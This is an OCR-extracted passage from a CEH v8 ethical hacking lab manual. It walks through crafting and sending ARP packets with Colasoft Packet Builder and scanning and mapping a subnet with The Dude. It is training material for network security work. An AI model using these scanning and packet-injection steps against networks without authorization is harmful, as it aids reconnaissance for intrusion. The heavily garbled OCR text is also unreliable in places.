to block the execution of malicious script. Anodier method of vulnerability checking is to scan a network using the Colasoft Packet Builder. 111 this lab, you will be learn about sniffing network packets, performing ARP poisoning, spoofing the network, and DNS poisoning. Lab O bjectives The objective of diis lab is to reinforce concepts of network security policy, policy enforcement, and policy audits. Lab Environm ent 111 diis lab, you need: ■ Colasoft Packet Builder located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksCustom Packet CreatorColasoft Packet Builder ■ A computer running Windows Server 2012 as host machine I C O N K E Y Valuable information Test vour knowledge Q W eb exercise Q W orkbook review ^TTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 250
  • 168. Module 03 - Scanning Networks ■ Window 8 running on virtual machine as target machine ■ You can also download die latest version of Advanced Colasoft Packet Builder from die link http:// www.colasoft.com/download/products/download_packet_builder. php ■ If you decide to download die latest version, dien screenshots shown in die lab might differ. ■ A web browser widi Internet connection nuuiing in host macliine Lab Duration Time: 10 Minutes O verview of Colasoft Packet Builder Colasoft Packet Builder creates and enables custom network packets. This tool can be used to verify network protection against attacks and intmders. Colasoft Packet Builder features a decoding editor allowing users to edit specific protocol field values much easier. Users are also able to edit decoding infonnation in two editors: Decode Editor and Hex Editor. Users can select any one of die provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet. Lab Tasks 1. Install and launch die Colasoft Packet Builder. 2. Launch the Start menu by hovering die mouse cursor on the lower-left corner of the desktop. S t a s k 1 Scanning Network FIGURE 17.1:Windows Server2012- Desktop view 3. Click the C olasoft Packet Builder 1.0 app to open the Colasoft Q y <“ You can download Packer Builder window Colasoft Packet Builder from http:/ /www.colasoft.com. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 251
  • 169. Module 03 - Scanning Networks Administrator Start S em * Windows PowerSN>ll Googte Chrome S»#Th C otaoft Packpt Bunder t.O ik m * * * computer control 1'anrt ManagM v M ochn#. *J V 91 9 e Command Prompt SQL J*rv*‫׳‬ Irn-.aljt 0 ‫י־‬ Center. MfrtjpaC* Studc ter V 3 s- e . MeuMa r»efax Nnwp 7«ftmap GUI CMtoo $ o FIGURE 17.2Windows Server2012- Apps 4. Tlie Colasoft Packet Builder main window appears. Colasoft Packet Builder ‫־‬ ‫־‬ ‫ך‬1=-1 Fie Edt Send Help ! # ^ 1 Import S?’ & 1 Add Insert ♦ Checksum [ A s ^ J 55 Adapter C o laso ft 4 $ Oecode Editor Packet No. No p x k e c elected: $ Packet Lilt Packets 0 Selected 0 1 Delta Time Sourer fatal 0 byte* | <L FIGURE 17.3: ColasoftPacket Buildermain screen ^ He«Edfcor >0:0 5. Before starting of vonr task, check diat die Adapter settings are set to default and dien click OK. Operating system requirements: Windows Server 2003 and 64-bit Edition Windows 2008 and 64-bit Edition Windows 7 and 64-bit Edition *Select Adapter ‫י‬ ? -iF.WlT.rtf&TaTi.FiAdapter: D4:BE:D9:C3:CE:2D0 100.0 l*)ps 1500 bytes 10.0.0.7/255.255.255.0 10.0.0.1 Operational Physical Address Link Speed Max Frame Size IP Address Default Gateway Adapter Status HelpCancelOK FIGURE 17.4: Colasoft PacketBuilderAdapter settings Ethical H acking and Counterm easures Copyright <0by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 252
  • 170. Module 03 - Scanning Networks 6. To add 01 create die packet, click Add 111 die menu section. File Edit Send Help 0 0 1 Import Export‫־‬‫״‬‫־‬ Add Insert [ ^ Decode Editor FIGURE 17.5: ColasoftPacket Buildercreatingdie packet 7. When an Add Packet dialog box pops up, you need to select die template and click OK. ‫־‬n nAdd Packet ARP Packet Second0.1 Select Template: Delta Time: HelpCancelOK There are two ways to create a packet - Add and Insert. The difference between these is the newly added packet's position in the Packet List. The new packet is listed as the last packet in the list if added but after the current packet if inserted. £ 2 Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and*cpf (Capsa 4.0 Packet File) format. You may also import data from ‫״‬.cap (Network Associates Sniffer packet files), *.pkt (EtherPeekv7/TokenPeek/ A1roPeekv9/OmniPeekv9 packet files), *.dmp (TCP DUMP), and *rawpkt (raw packet files). FIGURE 17.6: Cohsoft Packet BuilderAdd Packet dialogbox 8. You can view die added packets list 011 your right-hand side of your window. S T A s K 2 Decode Editor 9. Colasoft Packet Builder allows you to edit die decoding information in die two editors: Decode Editor and Hex Editor. Packet List Packets 1 Selected 1 _____Usl____DeltaTims . Source Destination______, 1 0.100000 00:00:00:00:00:00 FIGURE 17.7:Colasoft Packet BuilderPacket List Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 253
  • 171. Module 03 - Scanning Networks Decode Editor P ack et: Num:000001 L e n g th :64 C aptured:• B -© E th e rn e t Type I I [0/14] le s t i n a t i o n A d d ress: FF: FF: FF: FF: FF: FF [0/6] J © Source A ddress: 00:0 0 :0 0 :0 0 :0 0 :0 0 [6/6] j ! ^ P r o t o c o l : 0x0806 (ARP) [12. - sj ARP - A ddress R e so lu tio n P ro to c o l [14/28] !••••<#>Hardware ty p e : 1 (E th e rn e t) :P ro to c o l Type‫ץ‬#(! 0x0800 [16/2] j...© Hardware A ddress L ength: 6 [18/1] ‫©...ן‬ P ro to c o l A ddress L ength: 4 [19/1] ! |—<#1ype: 1 (ARP Reque. -^J>S0 u rc e P h y sics: 00:0 0 :0 0 :0 0 :0 0 :0 0 [22/6] j3 ‫״‬ Source IP : 0 .0 .0 .0 [28/4] D e s tin a tio n P h y sics: 00:0 0 :0 0 :0 0 :0 0 :0 0 [32/6] j D e s tin a tio n IP : 0 .0 .0 .0 [38/4] - •© E x tra D ata: [42/18] Number o f B y tes: FCS: 18 b y te s [42/18] L # FCS: 0xF577BDD9 , < L 111 j ......; ..... ,....‫־‬... ‫>״‬ J Q B u s t Mode Option: If you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option. FIGURE 17.8: Cohsoft PacketBuilderDecode Editor ^ Hex Editor Total 60 bytes 0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06 000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00 001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 002A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0038 00 00 00 00 . . . . V FIGURE 17.9:ColasoftPacketBuilderHexEditor 10. To send all packets at one time, click Send Allfrom die menu bar. 11. Check die Burst Mode option in die Send All Packets dialog window, and dien click Start. ‫ר‬ Colasoft Capsa Packet Analyzer ^4 Send AllSendChecksumJown 1 Packet List Packets 1 Selected 1 No. Delta Time Source Destination 1 0.100000 00:00:00:00:00:00 FF:FF:FF:FF:FF:FF .^O ption, Loop Sending: This defines the repeated times of the sending execution, one time in default. Please enter zero if you want to keep sending packets until you pause or stop it manually. FIGURE 17.10: Colasoft Packet Builder SendAll button Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 254
  • 172. Module 03 - Scanning Networks £ 3 Select a packet from the packet listing to activate Send All button FIGURE 17.11: Colasoft Packet BuilderSendAHPackets 12. Click Start Send All Packets Select... loops (zero for infinite loop) milliseconds Options Adapter: Realtek PCIe G8E Famrfy Controller □ Burst Mode (no delay between packets) □ Loop Sendng: 1 A - 1000 A -Delay Between Loops: 1000 Sending Information Total Packets: 1 Packets Sent: 1 Progress: HelpCloseStopStart £0T he progress bar presents an overview of the sending process you are engaged in at the moment. FIGURE 17.12 ColasoftPacket BuilderSendAHPackets 13. To export die packets sent from die File menu, select File‫^־‬Export‫^־‬All Packets. Ethical H acking and Counterm easures Copyright <0by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 255
  • 173. Module 03 - Scanning Networks ‫י‬ L? ‫ר״‬ Colas File Edit Send Help Import... 1 * 0 1 ‫׳‬ a X 1 0 Export ► All Packets... glete Exit ^ Selected Packets... ketNo. |_jJ I +^ T Packet: Num: 00( EJ-@ E th e rn e t Type I I ^ D e s t i n a t i o n A ddress: Source A ddress: ‫ן‬[0 /1 4] FF: FF:1 00:00:( , FIGURE 17.13: ExportAllPacketspotion Save As x I 5avein‫־‬ ! " ! : o la e c - f t flfcl Nome D«tc modified Type No items match your search. Rcccnt plocca ■ Desktop < 3 Libraries lA f f Computer Network r n ______ ... r>1 F1Un»m* | Fjiekct•e«cpld v j Sav• S»v• •c typ♦ (Colafloft Packot Rio (v6)(*.oocpkt) v | C«rc«l | FIGURE 17.14: Selectalocationto save the exported file U Packets.cscpkt FIGURE 17.15: ColasoftPacket Builderexportingpacket Lab Analysis Analyze and document die results related to the lab exercise. Tool/Utility Information Collected/Objectives Achieved Colasoft Packet Builder Adapter Used: Realtek PCIe Family Controller Selected Packet Name: ARP Packets Result: Captured packets are saved in packets.cscpkt Q Option, Packets Sent This shows the number of packets sent successfully. Colasoft Packet Builder displays the packets sent unsuccessfully, too, if there is a packet not sent out. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 256
  • 174. Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network. 2. Evaluate what types of instant messages Capsa monitors. 3. Determine whether die packet buffer affects performance. If yes, dien what steps do you take to avoid or reduce its effect on software? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 257
  • 175. Module 03 - Scanning Networks Lab Scanning Devices in a Network Using The Dude The Dnde automaticallyscansalldeviceswithin specifiedsubnets, draws andlaysout a wap ofyournetworks, monitorsservicesofyourdevices, anda/eftsyon in case someservicehasp roblems. Lab Scenario 111 the previous lab you learned how packets can be captured using Colasoft Packet Builder. Attackers too can sniff can capture and analyze packets from a network and obtain specific network information. The attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network. As an expert ethical hacker, you should be able to gadier information 011 organizations network to ch eck for vulnerabilities and fix them before an attacker g ets to com prom ise the m achines using th ose vulnerabilities. If you detect any attack that has been performed 011 a network, immediately implement preventative measures to stop any additional unauthorized access. 111 this lab you will learn to use The Dude tool to scan the devices in a network and the tool will alert you if any attack has been performed 011 the network. Lab O bjectives The objective of diis lab is to demonstrate how to scan all devices widiin specified subnets, draw and layout a map of your networks, and monitor services 011 die network. Lab Environm ent To carry out the lab, you need: ■ The Dude is located at D:CEH-T00lsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsThe Dude ■ You can also download the latest version of The Dude from the http: / / www.1nikiodk.com / thedude.php I CON KEY 5 Valuable information Test your knowledge Web exercise Workbook review V—JTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 258
  • 176. Module 03 - Scanning Networks ■ If you decide to download the latest version, then screen sh ots shown in the lab might differ ■ A computer running Windows Server 2012 ■ Double-click die The Dude and follow wizard-driven installation steps to install The Dude ■ Administrative privileges to run tools Lab Duration Time: 10 Minutes O verview of The Dude The Dude network monitor is a new application that can dramatically improve die way you manage your network environment It will automatically scan all devices within specified subnets, draw and layout a map of your networks, monitor services ofyour devices, and alert you in case some service lias problems. Lab Tasks 1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop. i | WindowsServer2012 Ser*r 2012M «a1e CandklateDitaceM* ______________________________________________________________________________________ Ev^mbonoopy BuildWX: FIGURE 18.1: Windows Server 2012- Desktop view 111 the Start menu, to launch The Dude, click The Dude icon. Start Administrator ^ Server Computer Maiwgcr iL U * f> ~ e v -—J ‫י‬ ‫י‬ M m nitr. command T<xJ1 Prompt 1n»0u0f 0—l»p % E t a s k 1 Launch The Dude Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 259
  • 177. Module 03 - Scanning Networks FIGURE 182: Windows Server2012- Startmenu 3. The main window of The Dude will appear. fSmm a d m in @ lo c a lh o s t - T h e D u d e 4 .0 b e ta 3 ’-l° l X ‫י‬ (§) 5references 9 Local Server Hdo jjyi2m c*‫״‬ m ! .TffB Setting* CJ Contert* 71S E 1 O * Ssttnst j Dkovo70011* ‫־‬ W .*.‫־‬‫־‬•. Lay* irk* v J □ A3<*T3SUSS A Admn# H 0 ‫»י‬ ‫»ו‬ H D*wic«» ?5?Flea □ FLnctona 5 M H tfay Action* H Lntu □ Lc0* £ 7 A^icn £ 7 Cecus £ 7 & ‫׳‬ent -A £ 7 Syslog E Notic? - B Keftroric Maps B Lccd I- 1U n irti [.Ca 1MU«d Ctert. a 9‫מ‬ bu« /tx 384 M S * ‫׳‬‫״*־‬ x215b c*.'U M 2bc« FIGURE 18.3:MainwindowofTheDude 4. Click the D iscover button on the toolbar of die main window. -------------------------- — ■■ a d m ir t@ lo c a lh o s t - T h e D u d e 4 .0 b e t a 3 1‫״‬. 3 E ® x ® ‫־‬ reference* 9 Local Seiver * b r h tZ a c ‫׳‬ * IIIIJHb Ca-'teri* + ‫״‬1- o * Settre# D kov* ‫־‬ | *T oo• ‫־‬• . • v 1 * « |lrk* _ d 2 Q Addra# list* A ‫׳‬vawro □ 0 ‫*ו‬‫יו‬ f‫“־‬l OmicM f* . Ftes n F_nccon8 ‫י‬ B H a a y Action* n 1^‫*י‬“ □ Leo* £ ? Acttcn £7 Defcus £7 Event £ 7 Sjobg R Mb Notie? - Q fcwortc Ma08 B Lccdl M '‫׳‬ |!Connected Cie‫׳‬ t.1x $59bus/tx 334bp* :«<* a215bo*<'u642bc« FIGURE 18.4: Selectdiscover button 5. The Device Discovery window appears. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 260
  • 178. Module 03 - Scanning Networks Device Discovery DiscoverGeneral Services Device Types Advanced CancelEnter subnet number you want to scan for devices Scan Networks: 110.0.0.0/24 ! -Agent: |P£g? P Add Networks To Auto Scan Black List: |i Device Name Preference: |DNS. SNMP. NETBIOS. IP Discovery Mode: ( • fast (scan by ping) C reliable (scan each service) I I I I I I I I 2 4 6 8 10 14 20 50 Recursive Hops: / ‫י‬‫ו‬ ‫י‬ ‫־‬ ‫ר‬ ‫פ‬ F Layout Map /tfter Discovery Complete FIGURE 18.6: Devicediscovery^‫־‬uxicra‫־‬ 6. 111the Device Discovery window, specify Scan Networks range, select default from die Agent drop-down list, select DNS, SNMP, NETBIOS, and IP from die D evice Name Preference drop-down list, and click Discover. Device Discovery number you want to scan for General Services Device Types Advanced Scan Networks: (10.0.0.0/24 Agent: 5 S S H B I r Add Networks To Auto Scan Black List: [none 3DNS. SNMP. NETBIOS. IPDevice Name Preference Discovery Mode ( • fast (scan by ping) C reliable (scan each service) 0 Recursive Hops: [1 ]▼] / —r ---------------------------------------------------------------‫ו‬—‫ו‬—1—‫ו‬—‫ר‬ 2 4 6 8 10 14 20 SO I- Layout Map /tfter Discovery Complete FIGURE 18.7: Selectingdevicename preference 7. Once the scan is complete, all the devices connected to a particular network will be displayed. Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 261
  • 179. Module 03 - Scanning Networks ‫־‬f t ^tadrmn@localhost The Dude 4.0beta3 + - _ ^ e : _ e [ o * | S W | | Dhcovef | ^Tooia t t 1 a s ‫י‬ - |l‫־‬ks ^ 209m: [10 11d Locd •fat ! _ llB SSanhfla •. WN-D39MR5 HL9E4 AOMN I ‫י‬.N‫י‬* WIN ?U't'.lO'.-tfS ‫ז‬ ‫ר‬ ‫ב‬ - ‫נ‬ ^ ‫א‬ ‫ו‬ Qy WW*IXY858KH04P ecu 19N fn«r: 63%vM: 27%disk 75% rMflfeMtttLUUKAl YHhH.K0H)ftR3fi?M _______________Ccrtemt f~ l *ricteo Lata .4Adnns □2«*<B Chats‫ק‬ □Oevteaa Pie*‫*׳‬- Q Fu1dion» 04*07Aeten» -‫״‬‫*י‬‫׳‬1H *00‫-י‬□ 127A*en L f Uofcoa ptVem asy*B □tob>10«m dn ‫־ז‬^‫״‬‫״‬‫ס‬*Map* Q Local ‫ק‬ Metwortc* Q NotActfont H□ PjTriS Q adrrin 127.0,0.1 QPxtee 5> Sennco QTcde r i ' r - r ^ r Saver r | ( ( 4(>> *3 9t® c«Q m - ‫׳‬x 32 5■‫׳‬ oc« ‫׳‬ w I95bpj FIGURE 18.8: Overviewofnetworkconnection 8. Select a device and place die mouse cursor on it to display the detailed information about diat device. ~*1Zoom.[TO♦• ‫״‬ % jo ^ StfttKujo Dwovw tftteOT.JLYKSO-CiPWrdcvnaxnpucr‘, IP• 100 0 9 MACCtt ■- 10 S*'42m (7V U>.da3 rcOiM 1C2 coj fnemcry vrtuai memoiy. cfck SjcrT!‫.*־״.ז‬vw.-’.‫׳‬-Y35am3ip Cesacto- -fc*».=«e ntes« FamlyGWsdd 42 9eppng 7M/MCOUPATBU - Virc0*5 Ito iai 6 & End 6001WipxnsrFix)Ipwue 0028‫־‬<J771 n-n(<»• 1rc»1c:r.•:‫י‬•*11■■ 1‫ג‬ a t 1‫נ‬ » iwttdai e UU liriMMOll- )>* l*» I»_i**WU«L'i»tX>:» 1*•: 13:ta ■ . W * ‫־‬.n m ‫,־‬ t «W-ll‫־‬r8!a.H0TP 12:40 12: X | mdiv0vnn-uiYKBocnP 12:3 12:31 Iecu• lam0«■a.'iaaeoip CartvM 5Ad<*«3a Lota AAdmr* R Afl*rta □Chat* Q08V1008Plea^ Q Functions □HatovV®*•* *□Lnk Lcoa‫־‬ □ ]J?Acton C7 Detua ?£Ewr L7S«bg BMbMod®* !,tetwo*Maps Blocal n Nnwwk• 2No!llc<Uor« Q Parris 127.00.1•* ™H cN»‫׳‬P□ Q>Samcas H Tocte n.134ttpa/fc33kbc«C V t m 2 45kbp* ‫'׳‬tx 197bp» FIGURE 18.9: Detailedinformationofthe device 9. N ow , click the down arrow for die Local drop-down list to see information 011 History Actions, Tools, Files. Logs, and so 011. Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 262
  • 180. Module 03 - Scanning Networks FIGURE 18.10: SelectingLocalinformation 10. Select options from die drop-down list to view complete information. ‫־‬ _ < ‫־‬ X ‫־‬, adm1r!@iocalha5t ‫־‬ The Dude4.0beta3 ® | | Preferences 19 Local S w » Heb •O SetBngj e• I~ Be‫׳‬nnt dn1£1‫*׳‬d Be‫׳‬n»nt chanjed btm rU tf»a•‫׳‬ B1‫׳־‬r*« changed blvw'i: J w j*0 Br‫׳‬nf‫׳‬r!changed H»w1!«.<>•‫׳‬j«0 Be-nem changed b c w : changed Bemem changed Be'IW>.»«'jeO Berotm changed 0c1‫*׳‬s‫׳‬r. changed Beroen: changed Bc1* ‫׳‬T. cha' Sed B f w t changed Bwnert changed Berne'S changed Bwmnl eta'jed Beroen! changed Aden NetwOlk Map Ner*e«k Map tM «ak Map Nerwak Map FMflCik Mat' Nmv»c«k Map fMocik Map Merwak Map fjnC*«k Map Nef«c<k Map NetWClk Map Netwcik Map r«(.«c«k Map r‫״‬er*cfk Map tat«ak Map tieCMdk Map Netwcik Map rjefMCik Map Netwcik Map Netwcik Map I 130245 13024C 13024S 130?44 1302S0 ‫ע‬?130 130254 130? K 130258 130340 130302 1303-03 13.0306 130348 13.03.14 1303 16 13.0320 130322 130324 1303 27 ‫ו‬ u 7 U 3 U * u 5 U C U 7 U fi U 9 u 10u ‫וו‬ u 12u 13 U 14 U 15 U •6 U 7‫ו‬ u 16 U 19 U 20u Co‫׳‬not? Q Add's** Luts 4 Mm» Q Aq*0U □Owl•r*1LVvis•• ‫ליי‬rte» Q Iundior* □ IW «y /towns M Lrk» ‫>־‬ □ Logs £7A=1‫״‬n £7 Debug £? Stfog Q Mb Nedcx CemtcM 0*rt ‫׳‬x9 17kbps/|x 1 I2 kbp• S«nv‫־‬a 3 74Ktv* 11 &‫׳׳‬ Tklcn ad^n^iocalhost - The Dude 4,Obeta3 ‫־‬ a * ® fafaenoee O toca s«n ‫״‬ * ‫׳‬*‫־‬ ihti^rSSB SSX SA l J‫״‬ C J U Type, (* 3 M * f‫־‬ ‫־‬ ^i T ] □ ‫י‬ i l l l De*c* UiZ.-r'tn ‫»ז<ז‬ lias 100 a ! n-=te Local 1000.12 incte Local 1000255 MTCte Local A D ** Mncte Local V/N2H9STOSG M‫־‬ rle Local WMOUMR5HL WCte Local V /fN « 6t< SG1 w ‫־‬* • Local W IU J O 0 M I unci* Local w!s«5sn.c1u M‫־‬ de Local trmo Local W KM W S8 M‫|״‬ * Local wwoowss *met* Local oI Getnrgj L‘ Comats 3 Address Lists & Adms Q Agents Q O w i• Q Devicw '<■ Fte» Q Functor• Q KtateiyActons ‫ם‬ Lrkj ‫יה״‬1‫ס‬1‫־‬ C7Aclcn C f CebuQ r> E v.rt LfS^oo CJMb!*<!». ‫מז‬4‫׳ל‬2■^‫ל‬*rc‫־‬‫׳‬0t2I6.'?‫־‬SerC flrr ‫׳‬x 2 91 kbps / tx 276bps FIGURE 18.11: Scannednetworkcompleteinformation Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 263
  • 181. Module 03 - Scanning Networks 11. As described previously, you may select all the other options from the drop-down list to view die respective information. 12. Once scanning is complete, click the button to disconnect. admin©localhost - The Dude 4.0beta3 Freferences 9 Local Server *•to • ‫ל‬ Settno) d C * ” + ‫״‬ r C. O k S*Crgc Onoowf ‫״‬ Tooli f t •*.‫״‬ * i " t> ,1 ‫י‬ WikULYSSBKHQIP WIN-D39NRSH1.91=4 ADMIN tp u 22% IM fTt SOS. v.it 34% disk 75% ‫י‬ v. ‫י‬ _ W IN -2N95T0SGIEM 1 0 0 0 .1 WM-LXQ3VR3!WM R Address U8I8 £ Adn<rM □ Agert« □ Chate □ Owces r*=1« n FLnaens Q HistoryActions H Linlcs = 3 Leg* C ‫־‬f Acton (ZJDcbuo Event O S/*>og □ Mto Nodeo Q Netv.'Oik Mips r B - l gcjj <| 1■ j [> ‫־‬ r ‫־‬‫־‬^ ‫־‬‫־‬ T ^ ‫רז‬‫־‬‫ה‬^‫ל‬^‫ר‬‫־‬ nZ Wkbw 'b 135 bps 5<?vrr rt i.12cp5 't* 3•15 *bps FIGURE 18.12:Connectionof systemsinnetwork Lab Analysis Analyze and document die results related to die lab exercise. Tool/Utility Information Collected/Objectives Achieved The Dude IP Address Range: 10.0.0.0 —10.0.0.24 Device Name Preferences: DNS, SNMP, NETBIOS, IP Output: List of connected system, devices in Network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 264
  • 182. Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . In te rn e t C o n n e ctio n R equired □ Yes 0 N o P la tfo rm S upported 0 C lassroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 265